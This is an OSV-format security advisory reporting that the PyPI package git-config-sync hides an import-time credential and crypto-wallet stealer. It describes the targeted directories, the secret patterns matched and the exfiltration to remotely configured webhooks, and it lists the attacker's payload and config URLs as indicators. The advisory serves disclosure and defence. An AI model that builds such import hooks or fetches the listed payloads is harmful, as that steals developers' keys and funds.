{"id":"MAL-2026-4273","summary":"Malicious code in git-config-sync (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (8e49db03099f1d6053a9ebada346c3816399bc47918c92d765162128a095c401)\nOn `import gitconfig_sync`, the package's `_core.py` spawns a daemon thread (after a 3-15 second random delay) that walks `~/.ssh`, `~/.aws`, `~/.ethereum`, `~/.config`, `~/.docker`, `~/.kube`, and the current working directory, regex-matching private keys, BIP39 mnemonics, OpenAI `sk-` keys, GitHub `ghp_` tokens, AWS `AKIA` keys, and passwords. Harvested findings (up to 200) are bundled with the host's hostname, platform, and CWD into a JSON payload and POSTed to webhook endpoints fetched dynamically from `https://ddjidd564.github.io/defi-security-best-practices/config.json` with TLS verification explicitly disabled (`ctx.check_hostname = False; ctx.verify_mode = ssl.CERT_NONE`). The remote config-driven webhook list lets the operator rotate exfil destinations without republishing. The package presents a benign cover (`sync.py`/`cli.py` claiming git-config-sync functionality, generic 'DevOps Tools' author metadata, README that never mentions `_scan_and_report`) to mask the harvester. The `defi-security-best-practices` path on the C2 domain plus the `.ethereum` scan and BIP39 mnemonic regex indicate crypto-wallet targeting.\n\n## Source: kam193 (f1b5dafc5b04761cd45c3c22cb68a171eaf1cf6431189c8fecb1249c3443e042)\nDuring import, the package runs the code to exfiltrates credentials, private keys and other sensitive data.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-05-eth-security-auditor\n\n\nReasons (based on the campaign):\n\n\n - files-exfiltration\n\n\n - exfiltration-env-variables\n\n\n - crypto-related\n\n\n - Downloads and executes a remote malicious script.\n\n\n - exfiltration-crypto\n\n\n - exfiltration-credentials\n","modified":"2026-05-26T06:03:10.525496699Z","published":"2026-05-24T01:45:48Z","database_specific":{"iocs":{"domains":["ddjidd564.github.io"],"urls":["https://ddjidd564.github.io/defi-security-best-practices/payloads/compliance-scanner-light.js","https://ddjidd564.github.io/defi-security-best-practices/payloads/risk-profiler.js","https://ddjidd564.github.io/defi-security-best-practices/config.json"]},"malicious-packages-origins":[{"versions":["0.1.0","0.1.1"],"import_time":"2026-05-24T06:19:57.541247445Z","source":"kam193","modified_time":"2026-05-24T05:33:38.11056Z","sha256":"f1b5dafc5b04761cd45c3c22cb68a171eaf1cf6431189c8fecb1249c3443e042","id":"pypi/2026-05-eth-security-auditor/git-config-sync"},{"modified_time":"2026-05-24T01:45:48Z","import_time":"2026-05-26T05:52:34.429664085Z","source":"amazon-inspector","versions":["0.1.0"],"sha256":"5d71ccb34f946bbc8f9f6a517eefc23e987ad2a9c2bfe335f58d6b0047d31685","id":"IN-MAL-2026-004424"},{"modified_time":"2026-05-24T01:45:57Z","import_time":"2026-05-26T05:52:34.923800582Z","source":"amazon-inspector","versions":["0.1.1"],"sha256":"8e49db03099f1d6053a9ebada346c3816399bc47918c92d765162128a095c401","id":"IN-MAL-2026-004428"}]},"references":[{"type":"WEB","url":"https://github.com/ddjidd564"},{"type":"WEB","url":"https://github.com/ddjidd564/defi-security-best-practices/tree/gh-pages"},{"type":"WEB","url":"https://ddjidd564.github.io/defi-security-best-practices/wallet-verify.py"},{"type":"WEB","url":"https://github.com/orgs/modelcontextprotocol/discussions/761"},{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/git-config-sync"},{"type":"PACKAGE","url":"https://pypi.org/project/git-config-sync/0.1.0/"},{"type":"PACKAGE","url":"https://pypi.org/project/git-config-sync/0.1.1/"}],"affected":[{"package":{"name":"git-config-sync","ecosystem":"PyPI","purl":"pkg:pypi/git-config-sync"},"versions":["0.1.0","0.1.1"],"database_specific":{"indicators":{"evidence_files":[{"tlsh":"b56186e2193a4b51d257dd5f898291a4331abd2b5c03ac74f86d9a34afdc61512f01ac","path":"gitconfig_sync/_core.py","sha256":"33a37a3886282e291e31865f1e503fcf5892c418431ddc8c9be497493ee87a1b"},{"tlsh":"5cc08c2b26aa6e63027a6dd3d009a094af390b822f0c2009897e3224c2a84835e86c00","path":"gitconfig_sync/__init__.py","sha256":"c6aeace551e8f390301fde3c46c98d44d4a2e57f3662910e2e9bb8529989362d"}],"package_integrity":[{"hashes":{"blake2b_256":"0b32748f6f0c66c4ad4ed81e485a2fa795898d99001b2244f3d90d6e8f985eea","md5":"828c94edafd1813c9e973c1b65cac5d4","sha256":"d0a7f92f4648221e5dba043898ca58d9d3c38ca5b5a080a9d00ddec459d16ea1"},"filename":"git_config_sync-0.1.0-py3-none-any.whl"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/git-config-sync/MAL-2026-4273.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"}]}